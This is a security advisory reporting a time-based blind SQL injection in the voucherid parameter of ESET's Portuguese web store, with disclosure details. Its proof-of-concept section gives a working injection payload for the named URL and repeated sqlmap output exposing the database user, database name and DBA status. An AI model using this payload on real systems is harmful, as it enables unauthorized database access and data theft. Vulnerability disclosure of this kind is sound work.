2017-006: SQL injection found in the portuguesse ESET ecommerce

Original release date: 25, 07 2017
Last revised: July 25, 2017
Severity: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

BACKGROUND

ESET is an IT security company that offers anti-virus and firewall products such as ESET NOD32.

DESCRIPTION

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

PROOF OF CONCEPT 

-------------------------
Vulnerable URL:     https://loja.eset.pt/index.php
Vulnerable parameter:     voucherid

Identified following injection points:

---
Parameter: voucherid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
banner:    '9/9/9X'
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: voucherid (GET)
   Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
banner:    '9/9/9X'
current user:    'mcatarino@%'
current database:    'eset_vouchers'
hostname:    'extra'
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: voucherid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: voucherid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: voucherid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
current user:    'mcatarino@%'
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: voucherid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
current user:    'mcatarino@%'
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: voucherid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
current user:    'mcatarino@%'

BUSINESS IMPACT

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

SYSTEMS AFFECTED

https://loja.eset.pt/

SOLUTION

Contact vendor for a fix.

REVISION HISTORY

July 25, 2017 : Initial release

DISCLOSURE TIMELINE

  • July 25, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • July 25, 2017 : Contact with ESET Security Team.

REFERENCES

Consult these external references for further information:

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.